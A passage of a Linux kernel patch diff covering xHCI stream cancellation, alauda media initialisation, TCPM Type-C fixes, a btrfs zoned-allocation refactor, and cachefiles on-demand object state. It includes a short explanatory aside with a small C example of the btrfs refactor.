+ 				break;
+ 			case TD_DIRTY: /* TD is cached, clear it */
+ 			case TD_HALTED:
++			case TD_CLEARING_CACHE_DEFERRED:
++				if (cached_td) {
++					if (cached_td->urb->stream_id != td->urb->stream_id) {
++						/* Multiple streams case, defer move dq */
++						xhci_dbg(xhci,
++							 "Move dq deferred: stream %u URB %p\n",
++							 td->urb->stream_id, td->urb);
++						td->cancel_status = TD_CLEARING_CACHE_DEFERRED;
++						break;
++					}
++
++					/* Should never happen, but clear the TD if it does */
++					xhci_warn(xhci,
++						  "Found multiple active URBs %p and %p in stream %u?\n",
++						  td->urb, cached_td->urb,
++						  td->urb->stream_id);
++					td_to_noop(xhci, ring, cached_td, false);
++					cached_td->cancel_status = TD_CLEARED;
++				}
++
+ 				td->cancel_status = TD_CLEARING_CACHE;
+-				if (cached_td)
+-					/* FIXME  stream case, several stopped rings */
+-					xhci_dbg(xhci,
+-						 "Move dq past stream %u URB %p instead of stream %u URB %p\n",
+-						 td->urb->stream_id, td->urb,
+-						 cached_td->urb->stream_id, cached_td->urb);
+ 				cached_td = td;
+ 				break;
+ 			}
+@@ -1013,10 +1027,16 @@ static int xhci_invalidate_cancelled_tds(struct xhci_virt_ep *ep)
+ 	if (err) {
+ 		/* Failed to move past cached td, just set cached TDs to no-op */
+ 		list_for_each_entry_safe(td, tmp_td, &ep->cancelled_td_list, cancelled_td_list) {
+-			if (td->cancel_status != TD_CLEARING_CACHE)
++			/*
++			 * Deferred TDs need to have the deq pointer set after the above command
++			 * completes, so if that failed we just give up on all of them (and
++			 * complain loudly since this could cause issues due to caching).
++			 */
++			if (td->cancel_status != TD_CLEARING_CACHE &&
++			    td->cancel_status != TD_CLEARING_CACHE_DEFERRED)
+ 				continue;
+-			xhci_dbg(xhci, "Failed to clear cancelled cached URB %p, mark clear anyway\n",
+-				 td->urb);
++			xhci_warn(xhci, "Failed to clear cancelled cached URB %p, mark clear anyway\n",
++				  td->urb);
+ 			td_to_noop(xhci, ring, td, false);
+ 			td->cancel_status = TD_CLEARED;
+ 		}
+@@ -1304,6 +1324,7 @@ static void xhci_handle_cmd_set_deq(struct xhci_hcd *xhci, int slot_id,
+ 	struct xhci_ep_ctx *ep_ctx;
+ 	struct xhci_slot_ctx *slot_ctx;
+ 	struct xhci_td *td, *tmp_td;
++	bool deferred = false;
+ 
+ 	ep_index = TRB_TO_EP_INDEX(le32_to_cpu(trb->generic.field[3]));
+ 	stream_id = TRB_TO_STREAM_ID(le32_to_cpu(trb->generic.field[2]));
+@@ -1390,6 +1411,8 @@ static void xhci_handle_cmd_set_deq(struct xhci_hcd *xhci, int slot_id,
+ 			xhci_dbg(ep->xhci, "%s: Giveback cancelled URB %p TD\n",
+ 				 __func__, td->urb);
+ 			xhci_td_cleanup(ep->xhci, td, ep_ring, td->status);
++		} else if (td->cancel_status == TD_CLEARING_CACHE_DEFERRED) {
++			deferred = true;
+ 		} else {
+ 			xhci_dbg(ep->xhci, "%s: Keep cancelled URB %p TD as cancel_status is %d\n",
+ 				 __func__, td->urb, td->cancel_status);
+@@ -1399,8 +1422,17 @@ static void xhci_handle_cmd_set_deq(struct xhci_hcd *xhci, int slot_id,
+ 	ep->ep_state &= ~SET_DEQ_PENDING;
+ 	ep->queued_deq_seg = NULL;
+ 	ep->queued_deq_ptr = NULL;
+-	/* Restart any rings with pending URBs */
+-	ring_doorbell_for_active_rings(xhci, slot_id, ep_index);
++
++	if (deferred) {
++		/* We have more streams to clear */
++		xhci_dbg(ep->xhci, "%s: Pending TDs to clear, continuing with invalidation\n",
++			 __func__);
++		xhci_invalidate_cancelled_tds(ep);
++	} else {
++		/* Restart any rings with pending URBs */
++		xhci_dbg(ep->xhci, "%s: All TDs cleared, ring doorbell\n", __func__);
++		ring_doorbell_for_active_rings(xhci, slot_id, ep_index);
++	}
+ }
+ 
+ static void xhci_handle_cmd_reset_ep(struct xhci_hcd *xhci, int slot_id,
+@@ -2506,9 +2538,8 @@ static int process_bulk_intr_td(struct xhci_hcd *xhci, struct xhci_virt_ep *ep,
+ 		goto finish_td;
+ 	case COMP_STOPPED_LENGTH_INVALID:
+ 		/* stopped on ep trb with invalid length, exclude it */
+-		ep_trb_len	= 0;
+-		remaining	= 0;
+-		break;
++		td->urb->actual_length = sum_trb_lengths(xhci, ep_ring, ep_trb);
++		goto finish_td;
+ 	case COMP_USB_TRANSACTION_ERROR:
+ 		if (xhci->quirks & XHCI_NO_SOFT_RETRY ||
+ 		    (ep->err_count++ > MAX_SOFT_RETRY) ||
+diff --git a/drivers/usb/host/xhci.h b/drivers/usb/host/xhci.h
+index fa9e87141e0bf..c42058bfcd160 100644
+--- a/drivers/usb/host/xhci.h
++++ b/drivers/usb/host/xhci.h
+@@ -1556,6 +1556,7 @@ enum xhci_cancelled_td_status {
+ 	TD_DIRTY = 0,
+ 	TD_HALTED,
+ 	TD_CLEARING_CACHE,
++	TD_CLEARING_CACHE_DEFERRED,
+ 	TD_CLEARED,
+ };
+ 
+diff --git a/drivers/usb/storage/alauda.c b/drivers/usb/storage/alauda.c
+index 115f05a6201a1..40d34cc28344a 100644
+--- a/drivers/usb/storage/alauda.c
++++ b/drivers/usb/storage/alauda.c
+@@ -105,6 +105,8 @@ struct alauda_info {
+ 	unsigned char sense_key;
+ 	unsigned long sense_asc;	/* additional sense code */
+ 	unsigned long sense_ascq;	/* additional sense code qualifier */
++
++	bool media_initialized;
+ };
+ 
+ #define short_pack(lsb,msb) ( ((u16)(lsb)) | ( ((u16)(msb))<<8 ) )
+@@ -476,11 +478,12 @@ static int alauda_check_media(struct us_data *us)
+ 	}
+ 
+ 	/* Check for media change */
+-	if (status[0] & 0x08) {
++	if (status[0] & 0x08 || !info->media_initialized) {
+ 		usb_stor_dbg(us, "Media change detected\n");
+ 		alauda_free_maps(&MEDIA_INFO(us));
+-		alauda_init_media(us);
+-
++		rc = alauda_init_media(us);
++		if (rc == USB_STOR_TRANSPORT_GOOD)
++			info->media_initialized = true;
+ 		info->sense_key = UNIT_ATTENTION;
+ 		info->sense_asc = 0x28;
+ 		info->sense_ascq = 0x00;
+diff --git a/drivers/usb/typec/tcpm/tcpm.c b/drivers/usb/typec/tcpm/tcpm.c
+index bbcc0e0aa070a..bb77f646366a5 100644
+--- a/drivers/usb/typec/tcpm/tcpm.c
++++ b/drivers/usb/typec/tcpm/tcpm.c
+@@ -2430,8 +2430,10 @@ static int tcpm_register_sink_caps(struct tcpm_port *port)
+ 	memcpy(caps.pdo, port->sink_caps, sizeof(u32) * port->nr_sink_caps);
+ 	caps.role = TYPEC_SINK;
+ 
+-	if (cap)
++	if (cap) {
+ 		usb_power_delivery_unregister_capabilities(cap);
++		port->partner_source_caps = NULL;
++	}
+ 
+ 	cap = usb_power_delivery_register_capabilities(port->partner_pd, &caps);
+ 	if (IS_ERR(cap))
+@@ -5446,6 +5448,7 @@ static void _tcpm_pd_hard_reset(struct tcpm_port *port)
+ 		port->tcpc->set_bist_data(port->tcpc, false);
+ 
+ 	switch (port->state) {
++	case TOGGLING:
+ 	case ERROR_RECOVERY:
+ 	case PORT_RESET:
+ 	case PORT_RESET_WAIT_OFF:
+diff --git a/fs/btrfs/disk-io.c b/fs/btrfs/disk-io.c
+index 5756edb37c61e..c17232659942d 100644
+--- a/fs/btrfs/disk-io.c
++++ b/fs/btrfs/disk-io.c
+@@ -51,15 +51,6 @@
+ 				 BTRFS_SUPER_FLAG_METADUMP |\
+ 				 BTRFS_SUPER_FLAG_METADUMP_V2)
+ 
+-static void btrfs_destroy_ordered_extents(struct btrfs_root *root);
+-static int btrfs_destroy_delayed_refs(struct btrfs_transaction *trans,
+-				      struct btrfs_fs_info *fs_info);
+-static void btrfs_destroy_delalloc_inodes(struct btrfs_root *root);
+-static int btrfs_destroy_marked_extents(struct btrfs_fs_info *fs_info,
+-					struct extent_io_tree *dirty_pages,
+-					int mark);
+-static int btrfs_destroy_pinned_extent(struct btrfs_fs_info *fs_info,
+-				       struct extent_io_tree *pinned_extents);
+ static int btrfs_cleanup_transaction(struct btrfs_fs_info *fs_info);
+ static void btrfs_error_commit_super(struct btrfs_fs_info *fs_info);
+ 
+@@ -4948,23 +4939,14 @@ static void btrfs_destroy_all_ordered_extents(struct btrfs_fs_info *fs_info)
+ 	btrfs_wait_ordered_roots(fs_info, U64_MAX, 0, (u64)-1);
+ }
+ 
+-static int btrfs_destroy_delayed_refs(struct btrfs_transaction *trans,
+-				      struct btrfs_fs_info *fs_info)
++static void btrfs_destroy_delayed_refs(struct btrfs_transaction *trans,
++				       struct btrfs_fs_info *fs_info)
+ {
+ 	struct rb_node *node;
+-	struct btrfs_delayed_ref_root *delayed_refs;
++	struct btrfs_delayed_ref_root *delayed_refs = &trans->delayed_refs;
+ 	struct btrfs_delayed_ref_node *ref;
+-	int ret = 0;
+-
+-	delayed_refs = &trans->delayed_refs;
+ 
+ 	spin_lock(&delayed_refs->lock);
+-	if (atomic_read(&delayed_refs->num_entries) == 0) {
+-		spin_unlock(&delayed_refs->lock);
+-		btrfs_debug(fs_info, "delayed_refs has NO entry");
+-		return ret;
+-	}
+-
+ 	while ((node = rb_first_cached(&delayed_refs->href_root)) != NULL) {
+ 		struct btrfs_delayed_ref_head *head;
+ 		struct rb_node *n;
+@@ -5024,8 +5006,6 @@ static int btrfs_destroy_delayed_refs(struct btrfs_transaction *trans,
+ 	btrfs_qgroup_destroy_extent_records(trans);
+ 
+ 	spin_unlock(&delayed_refs->lock);
+-
+-	return ret;
+ }
+ 
+ static void btrfs_destroy_delalloc_inodes(struct btrfs_root *root)
+diff --git a/fs/btrfs/extent_map.c b/fs/btrfs/extent_map.c
+index 56d7580fdc3c4..3518e638374ea 100644
+--- a/fs/btrfs/extent_map.c
++++ b/fs/btrfs/extent_map.c
+@@ -867,7 +867,7 @@ void btrfs_drop_extent_map_range(struct btrfs_inode *inode, u64 start, u64 end,
+ 					split->block_len = em->block_len;
+ 					split->orig_start = em->orig_start;
+ 				} else {
+-					const u64 diff = start + len - em->start;
++					const u64 diff = end - em->start;
+ 
+ 					split->block_len = split->len;
+ 					split->block_start += diff;
+diff --git a/fs/btrfs/zoned.c b/fs/btrfs/zoned.c
+index 99cb690da9893..2c42e85a3e269 100644
+--- a/fs/btrfs/zoned.c
++++ b/fs/btrfs/zoned.c
+@@ -1270,21 +1270,175 @@ static int calculate_alloc_pointer(struct btrfs_block_group *cache,
+ 	return ret;
+ }
+ 
++struct zone_info {
++	u64 physical;
++	u64 capacity;
++	u64 alloc_offset;
++};
++
++static int btrfs_load_zone_info(struct btrfs_fs_info *fs_info, int zone_idx,
++				struct zone_info *info, unsigned long *active,
++				struct map_lookup *map)
++{
++	struct btrfs_dev_replace *dev_replace = &fs_info->dev_replace;
++	struct btrfs_device *device;
++	int dev_replace_is_ongoing = 0;
++	unsigned int nofs_flag;
++	struct blk_zone zone;
++	int ret;
++
++	info->physical = map->stripes[zone_idx].physical;
++
++	down_read(&dev_replace->rwsem);
++	device = map->stripes[zone_idx].dev;
++
++	if (!device->bdev) {
++		up_read(&dev_replace->rwsem);
++		info->alloc_offset = WP_MISSING_DEV;
++		return 0;
++	}
++
++	/* Consider a zone as active if we can allow any number of active zones. */
++	if (!device->zone_info->max_active_zones)
++		__set_bit(zone_idx, active);
++
++	if (!btrfs_dev_is_sequential(device, info->physical)) {
++		up_read(&dev_replace->rwsem);
++		info->alloc_offset = WP_CONVENTIONAL;
++		return 0;
++	}
++
++	/* This zone will be used for allocation, so mark this zone non-empty. */
++	btrfs_dev_clear_zone_empty(device, info->physical);
++
++	dev_replace_is_ongoing = btrfs_dev_replace_is_ongoing(dev_replace);
++	if (dev_replace_is_ongoing && dev_replace->tgtdev != NULL)
++		btrfs_dev_clear_zone_empty(dev_replace->tgtdev, info->physical);
++
++	/*
++	 * The group is mapped to a sequential zone. Get the zone write pointer
++	 * to determine the allocation offset within the zone.
++	 */
++	WARN_ON(!IS_ALIGNED(info->physical, fs_info->zone_size));
++	nofs_flag = memalloc_nofs_save();
++	ret = btrfs_get_dev_zone(device, info->physical, &zone);
++	memalloc_nofs_restore(nofs_flag);
++	if (ret) {
++		up_read(&dev_replace->rwsem);
++		if (ret != -EIO && ret != -EOPNOTSUPP)
++			return ret;
++		info->alloc_offset = WP_MISSING_DEV;
++		return 0;
++	}
++
++	if (zone.type == BLK_ZONE_TYPE_CONVENTIONAL) {
++		btrfs_err_in_rcu(fs_info,
++		"zoned: unexpected conventional zone %llu on device %s (devid %llu)",
++			zone.start << SECTOR_SHIFT, rcu_str_deref(device->name),
++			device->devid);
++		up_read(&dev_replace->rwsem);
++		return -EIO;
++	}
++
++	info->capacity = (zone.capacity << SECTOR_SHIFT);
++
++	switch (zone.cond) {
++	case BLK_ZONE_COND_OFFLINE:
++	case BLK_ZONE_COND_READONLY:
++		btrfs_err(fs_info,
++		"zoned: offline/readonly zone %llu on device %s (devid %llu)",
++			  (info->physical >> device->zone_info->zone_size_shift),
++			  rcu_str_deref(device->name), device->devid);
++		info->alloc_offset = WP_MISSING_DEV;
++		break;
++	case BLK_ZONE_COND_EMPTY:
++		info->alloc_offset = 0;
++		break;
++	case BLK_ZONE_COND_FULL:
++		info->alloc_offset = info->capacity;
++		break;
++	default:
++		/* Partially used zone. */
++		info->alloc_offset = ((zone.wp - zone.start) << SECTOR_SHIFT);
++		__set_bit(zone_idx, active);
++		break;
++	}
++
++	up_read(&dev_replace->rwsem);
++
++	return 0;
++}
++
++static int btrfs_load_block_group_single(struct btrfs_block_group *bg,
++					 struct zone_info *info,
++					 unsigned long *active)
++{
++	if (info->alloc_offset == WP_MISSING_DEV) {
++		btrfs_err(bg->fs_info,
++			"zoned: cannot recover write pointer for zone %llu",
++			info->physical);
++		return -EIO;
++	}
++
++	bg->alloc_offset = info->alloc_offset;
++	bg->zone_capacity = info->capacity;
++	if (test_bit(0, active))
++		set_bit(BLOCK_GROUP_FLAG_ZONE_IS_ACTIVE, &bg->runtime_flags);
++	return 0;
++}
++
++static int btrfs_load_block_group_dup(struct btrfs_block_group *bg,
++				      struct map_lookup *map,
++				      struct zone_info *zone_info,
++				      unsigned long *active)
++{
++	if (map->type & BTRFS_BLOCK_GROUP_DATA) {
++		btrfs_err(bg->fs_info,
++			  "zoned: profile DUP not yet supported on data bg");
++		return -EINVAL;
++	}
++
++	if (zone_info[0].alloc_offset == WP_MISSING_DEV) {
++		btrfs_err(bg->fs_info,
++			  "zoned: cannot recover write pointer for zone %llu",
++			  zone_info[0].physical);
++		return -EIO;
++	}
++	if (zone_info[1].alloc_offset == WP_MISSING_DEV) {
++		btrfs_err(bg->fs_info,
++			  "zoned: cannot recover write pointer for zone %llu",
++			  zone_info[1].physical);
++		return -EIO;
++	}
++	if (zone_info[0].alloc_offset != zone_info[1].alloc_offset) {
++		btrfs_err(bg->fs_info,
++			  "zoned: write pointer offset mismatch of zones in DUP profile");
++		return -EIO;
++	}
++
++	if (test_bit(0, active) != test_bit(1, active)) {
++		if (!btrfs_zone_activate(bg))
++			return -EIO;
++	} else if (test_bit(0, active)) {
++		set_bit(BLOCK_GROUP_FLAG_ZONE_IS_ACTIVE, &bg->runtime_flags);
++	}
++
++	bg->alloc_offset = zone_info[0].alloc_offset;
++	bg->zone_capacity = min(zone_info[0].capacity, zone_info[1].capacity);
++	return 0;
++}
++
+ int btrfs_load_block_group_zone_info(struct btrfs_block_group *cache, bool new)
+ {
+ 	struct btrfs_fs_info *fs_info = cache->fs_info;
+ 	struct extent_map_tree *em_tree = &fs_info->mapping_tree;
+ 	struct extent_map *em;
+ 	struct map_lookup *map;
+-	struct btrfs_device *device;
+ 	u64 logical = cache->start;
+ 	u64 length = cache->length;
++	struct zone_info *zone_info = NULL;
+ 	int ret;
+ 	int i;
+-	unsigned int nofs_flag;
+-	u64 *alloc_offsets = NULL;
+-	u64 *caps = NULL;
+-	u64 *physical = NULL;
+ 	unsigned long *active = NULL;
+ 	u64 last_alloc = 0;
+ 	u32 num_sequential = 0, num_conventional = 0;
+@@ -1316,20 +1470,8 @@ int btrfs_load_block_group_zone_info(struct btrfs_block_group *cache, bool new)
+ 		goto out;
+ 	}
+ 
+-	alloc_offsets = kcalloc(map->num_stripes, sizeof(*alloc_offsets), GFP_NOFS);
+-	if (!alloc_offsets) {
+-		ret = -ENOMEM;
+-		goto out;
+-	}
+-
+-	caps = kcalloc(map->num_stripes, sizeof(*caps), GFP_NOFS);
+-	if (!caps) {
+-		ret = -ENOMEM;
+-		goto out;
+-	}
+-
+-	physical = kcalloc(map->num_stripes, sizeof(*physical), GFP_NOFS);
+-	if (!physical) {
++	zone_info = kcalloc(map->num_stripes, sizeof(*zone_info), GFP_NOFS);
++	if (!zone_info) {
+ 		ret = -ENOMEM;
+ 		goto out;
+ 	}
+@@ -1341,98 +1483,14 @@ int btrfs_load_block_group_zone_info(struct btrfs_block_group *cache, bool new)
+ 	}
+ 
+ 	for (i = 0; i < map->num_stripes; i++) {
+-		bool is_sequential;
+-		struct blk_zone zone;
+-		struct btrfs_dev_replace *dev_replace = &fs_info->dev_replace;
+-		int dev_replace_is_ongoing = 0;
+-
+-		device = map->stripes[i].dev;
+-		physical[i] = map->stripes[i].physical;
+-
+-		if (device->bdev == NULL) {
+-			alloc_offsets[i] = WP_MISSING_DEV;
+-			continue;
+-		}
+-
+-		is_sequential = btrfs_dev_is_sequential(device, physical[i]);
+-		if (is_sequential)
+-			num_sequential++;
+-		else
+-			num_conventional++;
+-
+-		/*
+-		 * Consider a zone as active if we can allow any number of
+-		 * active zones.
+-		 */
+-		if (!device->zone_info->max_active_zones)
+-			__set_bit(i, active);
+-
+-		if (!is_sequential) {
+-			alloc_offsets[i] = WP_CONVENTIONAL;
+-			continue;
+-		}
+-
+-		/*
+-		 * This zone will be used for allocation, so mark this zone
+-		 * non-empty.
+-		 */
+-		btrfs_dev_clear_zone_empty(device, physical[i]);
+-
+-		down_read(&dev_replace->rwsem);
+-		dev_replace_is_ongoing = btrfs_dev_replace_is_ongoing(dev_replace);
+-		if (dev_replace_is_ongoing && dev_replace->tgtdev != NULL)
+-			btrfs_dev_clear_zone_empty(dev_replace->tgtdev, physical[i]);
+-		up_read(&dev_replace->rwsem);
+-
+-		/*
+-		 * The group is mapped to a sequential zone. Get the zone write
+-		 * pointer to determine the allocation offset within the zone.
+-		 */
+-		WARN_ON(!IS_ALIGNED(physical[i], fs_info->zone_size));
+-		nofs_flag = memalloc_nofs_save();
+-		ret = btrfs_get_dev_zone(device, physical[i], &zone);
+-		memalloc_nofs_restore(nofs_flag);
+-		if (ret == -EIO || ret == -EOPNOTSUPP) {
+-			ret = 0;
+-			alloc_offsets[i] = WP_MISSING_DEV;
+-			continue;
+-		} else if (ret) {
+-			goto out;
+-		}
+-
+-		if (zone.type == BLK_ZONE_TYPE_CONVENTIONAL) {
+-			btrfs_err_in_rcu(fs_info,
+-	"zoned: unexpected conventional zone %llu on device %s (devid %llu)",
+-				zone.start << SECTOR_SHIFT,
+-				rcu_str_deref(device->name), device->devid);
+-			ret = -EIO;
++		ret = btrfs_load_zone_info(fs_info, i, &zone_info[i], active, map);
++		if (ret)
+ 			goto out;
+-		}
+-
+-		caps[i] = (zone.capacity << SECTOR_SHIFT);
+ 
+-		switch (zone.cond) {
+-		case BLK_ZONE_COND_OFFLINE:
+-		case BLK_ZONE_COND_READONLY:
+-			btrfs_err(fs_info,
+-		"zoned: offline/readonly zone %llu on device %s (devid %llu)",
+-				  physical[i] >> device->zone_info->zone_size_shift,
+-				  rcu_str_deref(device->name), device->devid);
+-			alloc_offsets[i] = WP_MISSING_DEV;
+-			break;
+-		case BLK_ZONE_COND_EMPTY:
+-			alloc_offsets[i] = 0;
+-			break;
+-		case BLK_ZONE_COND_FULL:
+-			alloc_offsets[i] = caps[i];
+-			break;
+-		default:
+-			/* Partially used zone */
+-			alloc_offsets[i] =
+-					((zone.wp - zone.start) << SECTOR_SHIFT);
+-			__set_bit(i, active);
+-			break;
+-		}
++		if (zone_info[i].alloc_offset == WP_CONVENTIONAL)
++			num_conventional++;
++		else
++			num_sequential++;
+ 	}
+ 
+ 	if (num_sequential > 0)
+@@ -1456,56 +1514,10 @@ int btrfs_load_block_group_zone_info(struct btrfs_block_group *cache, bool new)
+ 
+ 	switch (map->type & BTRFS_BLOCK_GROUP_PROFILE_MASK) {
+ 	case 0: /* single */
+-		if (alloc_offsets[0] == WP_MISSING_DEV) {
+-			btrfs_err(fs_info,
+-			"zoned: cannot recover write pointer for zone %llu",
+-				physical[0]);
+-			ret = -EIO;
+-			goto out;
+-		}
+-		cache->alloc_offset = alloc_offsets[0];
+-		cache->zone_capacity = caps[0];
+-		if (test_bit(0, active))
+-			set_bit(BLOCK_GROUP_FLAG_ZONE_IS_ACTIVE, &cache->runtime_flags);
++		ret = btrfs_load_block_group_single(cache, &zone_info[0], active);
+ 		break;
+ 	case BTRFS_BLOCK_GROUP_DUP:
+-		if (map->type & BTRFS_BLOCK_GROUP_DATA) {
+-			btrfs_err(fs_info, "zoned: profile DUP not yet supported on data bg");
+-			ret = -EINVAL;
+-			goto out;
+-		}
+-		if (alloc_offsets[0] == WP_MISSING_DEV) {
+-			btrfs_err(fs_info,
+-			"zoned: cannot recover write pointer for zone %llu",
+-				physical[0]);
+-			ret = -EIO;
+-			goto out;
+-		}
+-		if (alloc_offsets[1] == WP_MISSING_DEV) {
+-			btrfs_err(fs_info,
+-			"zoned: cannot recover write pointer for zone %llu",
+-				physical[1]);
+-			ret = -EIO;
+-			goto out;
+-		}
+-		if (alloc_offsets[0] != alloc_offsets[1]) {
+-			btrfs_err(fs_info,
+-			"zoned: write pointer offset mismatch of zones in DUP profile");
+-			ret = -EIO;
+-			goto out;
+-		}
+-		if (test_bit(0, active) != test_bit(1, active)) {
+-			if (!btrfs_zone_activate(cache)) {
+-				ret = -EIO;
+-				goto out;
+-			}
+-		} else {
+-			if (test_bit(0, active))
+-				set_bit(BLOCK_GROUP_FLAG_ZONE_IS_ACTIVE,
+-					&cache->runtime_flags);
+-		}
+-		cache->alloc_offset = alloc_offsets[0];
+-		cache->zone_capacity = min(caps[0], caps[1]);
++		ret = btrfs_load_block_group_dup(cache, map, zone_info, active);
+ 		break;
+ 	case BTRFS_BLOCK_GROUP_RAID1:
+ 	case BTRFS_BLOCK_GROUP_RAID0:
+@@ -1558,9 +1570,7 @@ int btrfs_load_block_group_zone_info(struct btrfs_block_group *cache, bool new)
+ 		cache->physical_map = NULL;
+ 	}
+ 	bitmap_free(active);
+-	kfree(physical);
+-	kfree(caps);
+-	kfree(alloc_offsets);
++	kfree(zone_info);
+ 	free_extent_map(em);
+ 
+ 	return ret;
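
The zoned-btrfs refactor above is a classic parallel-arrays-to-array-of-structs conversion: alloc_offsets[], caps[] and physical[] become one struct zone_info per stripe, cutting three allocations (and three error paths) down to one. Reduced to its essentials, with an illustrative stripe count:

#include <stdlib.h>

struct zone_info {
	unsigned long long physical;
	unsigned long long capacity;
	unsigned long long alloc_offset;
};

int main(void)
{
	int num_stripes = 2;	/* e.g. a DUP block group */

	/* Before: three kcalloc()s and three kfree()s, with indices kept
	 * in sync by hand. After: one allocation, one free. */
	struct zone_info *zi = calloc(num_stripes, sizeof(*zi));
	if (!zi)
		return 1;
	zi[0].alloc_offset = 0;	/* filled per stripe by btrfs_load_zone_info() */
	free(zi);
	return 0;
}
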
+diff --git a/fs/cachefiles/daemon.c b/fs/cachefiles/daemon.c
+index 5f4df9588620f..b9945e4f697be 100644
+--- a/fs/cachefiles/daemon.c
++++ b/fs/cachefiles/daemon.c
+@@ -77,6 +77,7 @@ static const struct cachefiles_daemon_cmd cachefiles_daemon_cmds[] = {
+ 	{ "tag",	cachefiles_daemon_tag		},
+ #ifdef CONFIG_CACHEFILES_ONDEMAND
+ 	{ "copen",	cachefiles_ondemand_copen	},
++	{ "restore",	cachefiles_ondemand_restore	},
+ #endif
+ 	{ "",		NULL				}
+ };
+@@ -132,7 +133,7 @@ static int cachefiles_daemon_open(struct inode *inode, struct file *file)
+ 	return 0;
+ }
+ 
+-static void cachefiles_flush_reqs(struct cachefiles_cache *cache)
++void cachefiles_flush_reqs(struct cachefiles_cache *cache)
+ {
+ 	struct xarray *xa = &cache->reqs;
+ 	struct cachefiles_req *req;
+@@ -158,6 +159,7 @@ static void cachefiles_flush_reqs(struct cachefiles_cache *cache)
+ 	xa_for_each(xa, index, req) {
+ 		req->error = -EIO;
+ 		complete(&req->done);
++		__xa_erase(xa, index);
+ 	}
+ 	xa_unlock(xa);
+ 
+diff --git a/fs/cachefiles/interface.c b/fs/cachefiles/interface.c
+index a69073a1d3f06..bde23e156a63c 100644
+--- a/fs/cachefiles/interface.c
++++ b/fs/cachefiles/interface.c
+@@ -31,6 +31,11 @@ struct cachefiles_object *cachefiles_alloc_object(struct fscache_cookie *cookie)
+ 	if (!object)
+ 		return NULL;
+ 
++	if (cachefiles_ondemand_init_obj_info(object, volume)) {
++		kmem_cache_free(cachefiles_object_jar, object);
++		return NULL;
++	}
++
+ 	refcount_set(&object->ref, 1);
+ 
+ 	spin_lock_init(&object->lock);
+@@ -88,7 +93,7 @@ void cachefiles_put_object(struct cachefiles_object *object,
+ 		ASSERTCMP(object->file, ==, NULL);
+ 
+ 		kfree(object->d_name);
+-
++		cachefiles_ondemand_deinit_obj_info(object);
+ 		cache = object->volume->cache->cache;
+ 		fscache_put_cookie(object->cookie, fscache_cookie_put_object);
+ 		object->cookie = NULL;
+diff --git a/fs/cachefiles/internal.h b/fs/cachefiles/internal.h
+index 2ad58c4652084..3eea52462fc87 100644
+--- a/fs/cachefiles/internal.h
++++ b/fs/cachefiles/internal.h
+@@ -44,6 +44,20 @@ struct cachefiles_volume {
+ 	struct dentry			*fanout[256];	/* Fanout subdirs */
+ };
+ 
++enum cachefiles_object_state {
++	CACHEFILES_ONDEMAND_OBJSTATE_CLOSE, /* Anonymous fd closed by daemon or initial state */
++	CACHEFILES_ONDEMAND_OBJSTATE_OPEN, /* Anonymous fd associated with object is available */
++	CACHEFILES_ONDEMAND_OBJSTATE_REOPENING, /* Object that was closed and is being reopened. */
++};
++
++struct cachefiles_ondemand_info {
++	struct work_struct		ondemand_work;
++	int				ondemand_id;
++	enum cachefiles_object_state	state;
++	struct cachefiles_object	*object;
++	spinlock_t			lock;
++};
++
+ /*
+  * Backing file state.
+  */
+@@ -61,7 +75,7 @@ struct cachefiles_object {
+ 	unsigned long			flags;
+ #define CACHEFILES_OBJECT_USING_TMPFILE	0		/* Have an unlinked tmpfile */
+ #ifdef CONFIG_CACHEFILES_ONDEMAND
+-	int				ondemand_id;
++	struct cachefiles_ondemand_info	*ondemand;
+ #endif
+ };
+ 
+@@ -125,6 +139,7 @@ static inline bool cachefiles_in_ondemand_mode(struct cachefiles_cache *cache)
+ struct cachefiles_req {
+ 	struct cachefiles_object *object;
+ 	struct completion done;
++	refcount_t ref;
+ 	int error;
+ 	struct cachefiles_msg msg;
+ };
+@@ -173,6 +188,7 @@ extern int cachefiles_has_space(struct cachefiles_cache *cache,
+  * daemon.c
+  */
+ extern const struct file_operations cachefiles_daemon_fops;
++extern void cachefiles_flush_reqs(struct cachefiles_cache *cache);
+ extern void cachefiles_get_unbind_pincount(struct cachefiles_cache *cache);
+ extern void cachefiles_put_unbind_pincount(struct cachefiles_cache *cache);
+ 
+@@ -290,12 +306,35 @@ extern ssize_t cachefiles_ondemand_daemon_read(struct cachefiles_cache *cache,
+ extern int cachefiles_ondemand_copen(struct cachefiles_cache *cache,
+ 				     char *args);
+ 
++extern int cachefiles_ondemand_restore(struct cachefiles_cache *cache,
++					char *args);
++
+ extern int cachefiles_ondemand_init_object(struct cachefiles_object *object);
+ extern void cachefiles_ondemand_clean_object(struct cachefiles_object *object);
+ 
+ extern int cachefiles_ondemand_read(struct cachefiles_object *object,
+ 				    loff_t pos, size_t len);
+ 
++extern int cachefiles_ondemand_init_obj_info(struct cachefiles_object *obj,
++					struct cachefiles_volume *volume);
++extern void cachefiles_ondemand_deinit_obj_info(struct cachefiles_object *obj);
++
++#define CACHEFILES_OBJECT_STATE_FUNCS(_state, _STATE)	\
++static inline bool								\
++cachefiles_ondemand_object_is_##_state(const struct cachefiles_object *object) \
++{												\
++	return object->ondemand->state == CACHEFILES_ONDEMAND_OBJSTATE_##_STATE; \
++}												\
++												\
++static inline void								\
++cachefiles_ondemand_set_object_##_state(struct cachefiles_object *object) \
++{												\
++	object->ondemand->state = CACHEFILES_ONDEMAND_OBJSTATE_##_STATE; \
++}
++
++CACHEFILES_OBJECT_STATE_FUNCS(open, OPEN);
++CACHEFILES_OBJECT_STATE_FUNCS(close, CLOSE);
++CACHEFILES_OBJECT_STATE_FUNCS(reopening, REOPENING);
+ #else
+ static inline ssize_t cachefiles_ondemand_daemon_read(struct cachefiles_cache *cache,
+ 					char __user *_buffer, size_t buflen)
+@@ -317,6 +356,15 @@ static inline int cachefiles_ondemand_read(struct cachefiles_object *object,
+ {
+ 	return -EOPNOTSUPP;
+ }
++
++static inline int cachefiles_ondemand_init_obj_info(struct cachefiles_object *obj,
++						struct cachefiles_volume *volume)
++{
++	return 0;
++}
++static inline void cachefiles_ondemand_deinit_obj_info(struct cachefiles_object *obj)
++{
++}
+ #endif
+ 
+ /*
+@@ -367,6 +415,8 @@ do {							\
+ 	pr_err("I/O Error: " FMT"\n", ##__VA_ARGS__);	\
+ 	fscache_io_error((___cache)->cache);		\
+ 	set_bit(CACHEFILES_DEAD, &(___cache)->flags);	\
++	if (cachefiles_in_ondemand_mode(___cache))	\
++		cachefiles_flush_reqs(___cache);	\
+ } while (0)
+ 
+ #define cachefiles_io_error_obj(object, FMT, ...)			\
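
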